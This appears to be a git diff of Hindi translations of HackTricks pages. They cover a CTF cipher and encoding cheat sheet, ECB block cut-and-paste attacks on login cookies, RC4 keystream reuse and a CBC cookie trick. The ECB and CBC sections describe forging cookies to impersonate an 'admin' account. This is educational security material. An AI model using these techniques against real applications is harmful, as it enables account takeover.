* `kLD8igSXm2KZlwrX`
|
||||
* **TIGO3FX** \[]
|
||||
* **टिगो3एफएक्स** \[]
|
||||
* `7AP9mIzdmltYmIP9mWXX`
|
||||
* **TRIPO5** \[]
|
||||
* **त्रिपो5** \[]
|
||||
* `UE9vSbnBW6psVzxB`
|
||||
* **FERON74** \[]
|
||||
* **फेरोन74** \[]
|
||||
* `PbGkNudxCzaKBm0x`
|
||||
* **GILA7** \[]
|
||||
* **गिला7** \[]
|
||||
* `D+nkv8C1qIKMErY1`
|
||||
* **Citrix CTX1** \[]
|
||||
* **सिट्रिक्स सीटीएक्स1** \[]
|
||||
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
|
||||
|
||||
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 डेड: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
|
||||
### हैकराइज़ एक्सएस \[_╫Λ↻├☰┏_]
|
||||
### हैकराइज़एक्सएस \[_╫Λ↻├☰┏_]
|
||||
```
|
||||
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
|
||||
```
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मरा हुआ: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मृत: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
|
||||
### मोर्स
|
||||
```
|
||||
|
@ -176,7 +130,7 @@ ryvkryvkryvkryvkryvkryvkryvk
|
|||
```
|
||||
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
|
||||
|
||||
### ASCII85
|
||||
### एएससीआई85
|
||||
```
|
||||
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
|
||||
```
|
||||
|
@ -196,17 +150,17 @@ drnajapajrna
|
|||
```
|
||||
### अफाइन गुप्ताक्षर एन्कोड
|
||||
|
||||
पत्र को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ पत्र है) और परिणाम को फिर से पत्र में बदलें
|
||||
अक्षर को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ अक्षर है) और परिणाम को फिर से अक्षर में बदलें
|
||||
```
|
||||
krodfdudfrod
|
||||
```
|
||||
### एसएमएस कोड
|
||||
|
||||
**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन कीपैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा परिभाषित दोहरी अंकों से बदल दिया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\
|
||||
**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन की पैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा परिभाषित बार-बार अंकों से बदल दिया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\
|
||||
उदाहरण: 2=A, 22=B, 222=C, 3=D...\
|
||||
आप इस कोड को पहचान सकते हैं क्योंकि आपको\*\* कई बार दोहराए गए अंक\*\* दिखाई देंगे।
|
||||
|
||||
आप इस कोड को डीकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
|
||||
आप इस कोड को डिकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
|
||||
|
||||
### बेकन कोड
|
||||
|
||||
|
@ -221,9 +175,9 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
|
|||
|
||||
## संक्षेपण
|
||||
|
||||
**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विस्तारित कर सकते हैं।
|
||||
**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विसंक्षेपित कर सकते हैं।
|
||||
|
||||
## सरल क्रिप्टो
|
||||
## सरल एन्क्रिप्शन
|
||||
|
||||
### XOR - ऑटोसॉल्वर
|
||||
|
||||
|
@ -274,22 +228,23 @@ Key:
|
|||
* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
|
||||
* [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF)
|
||||
|
||||
## Tools
|
||||
## उपकरण
|
||||
|
||||
* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
|
||||
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
|
||||
* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,46 +1,46 @@
|
|||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
|
||||
{% endhint %}
|
||||
|
||||
# ECB
|
||||
|
||||
(ECB) इलेक्ट्रॉनिक कोड बुक - सममित्र एन्क्रिप्शन योजना जो **प्रत्येक ब्लॉक को साफ पाठ के ब्लॉक से बदल देती है**। यह **सरलतम** एन्क्रिप्शन योजना है। मुख्य विचार यह है कि स्पष्ट पाठ को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल एक ही कुंजी का उपयोग करके प्रत्येक स्पष्ट पाठ के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है।
|
||||
(ECB) इलेक्ट्रॉनिक कोड बुक - सममित एन्क्रिप्शन स्कीम जो **प्रत्येक ब्लॉक को क्लियर पाठ** को **साइपरटेक्स्ट के ब्लॉक से** बदल देता है। यह **सबसे सरल** एन्क्रिप्शन स्कीम है। मुख्य विचार यह है कि क्लियर पाठ को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल कुंजी का उपयोग करके प्रत्येक क्लियर पाठ के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है।
|
||||
|
||||
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
|
||||
|
||||
ECB का उपयोग करने के कई सुरक्षा प्रभाव होते हैं:
|
||||
ECB का उपयोग करने के कई सुरक्षा प्रभाव हैं:
|
||||
|
||||
* **एन्क्रिप्टेड संदेश से ब्लॉक हटा दिए जा सकते हैं**
|
||||
* **एन्क्रिप्टेड संदेश से ब्लॉक हटा सकते हैं**
|
||||
* **एन्क्रिप्टेड संदेश से ब्लॉक चले जा सकते हैं**
|
||||
|
||||
# सुरक्षा दोष का पता लगाना
|
||||
|
||||
कल्पना करें कि आप कई बार एक एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\
|
||||
कल्पना करें आप कई बार एक एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\
|
||||
फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\
|
||||
आप पाता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान है, **बराबर** हैं। तब, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**।
|
||||
आप पता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान हैं, **बराबर** हैं। तो, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**।
|
||||
|
||||
जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** हैं।
|
||||
जैसे निम्नलिखित उदाहरण में। ध्यान दें कि इन **2 डिकोड कुकी** में कई बार ब्लॉक **`\x23U\xE45K\xCB\x21\xC8`** है।
|
||||
```
|
||||
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
|
||||
|
||||
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
|
||||
```
|
||||
यह इसलिए है क्योंकि **कुकीज़ के उस उपयोक्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल थे** (उदाहरण के लिए)। वे **ब्लॉक** जो **विभिन्न** हैं, वे उन ब्लॉक्स हैं जिनमें **कम से कम 1 विभिन्न वर्ण था** (शायद विभाजक "|" या उपयोक्ता नाम में कोई आवश्यक भिन्नता)।
|
||||
यह इसलिए है क्योंकि **कुकीज़ का उपयोगकर्ता नाम और पासवर्ड में कई बार अक्षर "a" शामिल था** (उदाहरण के लिए)। **विभिन्न ब्लॉक** वे ब्लॉक हैं जिनमें **कम से कम 1 विभिन्न वर्ण शामिल था** (शायद विभाजक "|" या उपयोगकर्ता नाम में आवश्यक भिन्नता)।
|
||||
|
||||
अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोक्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोक्ता नाम>` है। इसके लिए, वह **कई उपयोक्ता नाम** उत्पन्न कर सकता है **जिनमें समान और लंबे उपयोक्ता नाम और पासवर्ड हों** जब तक वह प्रारूप और विभाजक की लंबाई को न पाए:
|
||||
अब, हमलावर को बस यह पता लगाना है कि प्रारूप `<उपयोगकर्ता नाम><विभाजक><पासवर्ड>` है या `<पासवर्ड><विभाजक><उपयोगकर्ता नाम>` है। इसके लिए, वह बस **कई उपयोगकर्ता नाम** उत्पन्न कर सकता है जिनमें **समान और लंबे उपयोगकर्ता नाम और पासवर्ड** हों जब तक वह प्रारूप और विभाजक की लंबाई का पता नहीं लगा लेता है:
|
||||
|
||||
| उपयोक्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयोक्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): |
|
||||
| उपयोगकर्ता नाम की लंबाई: | पासवर्ड की लंबाई: | उपयोगकर्ता नाम + पासवर्ड की लंबाई: | कुकी की लंबाई (डिकोडिंग के बाद): |
|
||||
| ---------------- | ---------------- | ------------------------- | --------------------------------- |
|
||||
| 2 | 2 | 4 | 8 |
|
||||
| 3 | 3 | 6 | 8 |
|
||||
|
@ -52,7 +52,7 @@ ECB का उपयोग करने के कई सुरक्षा प
|
|||
|
||||
## पूरे ब्लॉक हटाना
|
||||
|
||||
कुकी के प्रारूप को जानकर (`<उपयोक्ता नाम>|<पासवर्ड>`), उपयोक्ता नाम `एडमिन` का अनुकरण करने के लिए एक नया उपयोक्ता बनाएं `aaaaaaaaadmin` और कुकी प्राप्त करें और इसे डिकोड करें:
|
||||
कुकी के प्रारूप को जानकर (`<उपयोगकर्ता नाम>|<पासवर्ड>`), उपयोगकर्ता नाम `admin` का अनुकरण करने के लिए एक नया उपयोगकर्ता बनाएं `aaaaaaaaadmin` और कुकी प्राप्त करें और इसे डिकोड करें:
|
||||
```
|
||||
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
|
@ -61,19 +61,19 @@ ECB का उपयोग करने के कई सुरक्षा प
|
|||
```
|
||||
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
|
||||
```
|
||||
## ब्लॉक्स को हटाना
|
||||
## ब्लॉक्स को ले जाना
|
||||
|
||||
कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना समान होता है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_
|
||||
कई डेटाबेस में `WHERE username='admin';` खोजना या `WHERE username='admin ';` खोजना एक ही बात है _(अतिरिक्त रिक्त स्थानों का ध्यान दें)_
|
||||
|
||||
इसलिए, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है:
|
||||
तो, उपयोगकर्ता `admin` का अनुकरण करने का एक और तरीका है:
|
||||
|
||||
* एक उपयोगकर्ता नाम जेनरेट करें जो: `len(<username>) + len(<delimiter) % len(block)`. `8B` ब्लॉक साइज के साथ आप `username ` नामक उपयोगकर्ता नाम जेनरेट कर सकते हैं, डिलीमिटर `|` के साथ टुकड़ा `<username><delimiter>` 2 ब्लॉक्स को जेनरेट करेगा।
|
||||
* फिर, एक पासवर्ड जेनरेट करें जो उस उपयोगकर्ता नाम और रिक्त स्थानों को भरेगा, जिसे हम अनुकरण करना चाहते हैं, जैसे: `admin `
|
||||
* एक उपयोगकर्ता नाम जेनरेट करें जो इस प्रकार हो: `len(<username>) + len(<delimiter) % len(block)`. `8B` ब्लॉक साइज के साथ आप `username ` नामक उपयोगकर्ता उत्पन्न कर सकते हैं, डिलीमिटर `|` के साथ टुकड़ा `<username><delimiter>` 2 ब्लॉक्स को उत्पन्न करेगा।
|
||||
* फिर, एक पासवर्ड जेनरेट करें जो उस उपयोगकर्ता को अनुकरण करने और रिक्त स्थानों को भरने के लिए ब्लॉक्स की एक सटीक संख्या में होगा, जैसे: `admin `
|
||||
|
||||
इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता नाम का नकली है): `username |admin `
|
||||
इस उपयोगकर्ता की कुकी 3 ब्लॉक्स से बनी होगी: पहले 2 उपयोगकर्ता के ब्लॉक्स + डिलीमिटर और तीसरा पासवर्ड का ब्लॉक (जो उपयोगकर्ता का अनुकरण कर रहा है): `username |admin `
|
||||
|
||||
** फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`**
|
||||
**फिर, बस पहले ब्लॉक को आखिरी ब्लॉक के साथ बदल दें और उपयोगकर्ता `admin` का अनुकरण कर रहे होंगे: `admin |username`**
|
||||
|
||||
# संदर्भ
|
||||
## संदर्भ
|
||||
|
||||
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
यदि आप किसी प्लेनटेक्स्ट को RC4 का उपयोग करके एन्क्रिप्ट कर सकते हैं, तो आप उस RC4 द्वारा एन्क्रिप्ट किए गए किसी भी सामग्री को (एक ही पासवर्ड का उपयोग करके) केवल एन्क्रिप्शन फ़ंक्शन का उपयोग करके डिक्रिप्ट कर सकते हैं।
|
||||
|
@ -20,3 +21,22 @@
|
|||
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
|
||||
|
||||
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,29 +1,30 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में **पीआर जमा करके**।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# CBC
|
||||
|
||||
यदि **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**व्यवस्थापक**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** का **ब्रूटफोर्स** कर सकते हैं।
|
||||
अगर **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**एडमिन**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** को **ब्रूटफोर्स** कर सकते हैं।
|
||||
|
||||
# CBC-MAC
|
||||
|
||||
